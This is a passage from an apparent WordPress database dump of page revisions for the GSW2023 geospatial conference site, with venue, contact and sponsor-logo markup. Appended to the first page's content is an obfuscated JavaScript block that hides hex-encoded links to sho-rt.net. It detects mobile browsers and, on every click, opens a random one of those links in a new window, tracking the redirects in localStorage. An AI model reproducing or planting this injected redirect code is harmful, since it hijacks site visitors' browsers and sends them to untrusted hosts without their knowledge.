image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:23:27','2023-07-25 02:23:27','',3066,'https://gsw2023.com/?p=5049',0,'revision','',0),
(5051,1,'2023-07-27 09:59:48','2023-07-27 09:59:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: 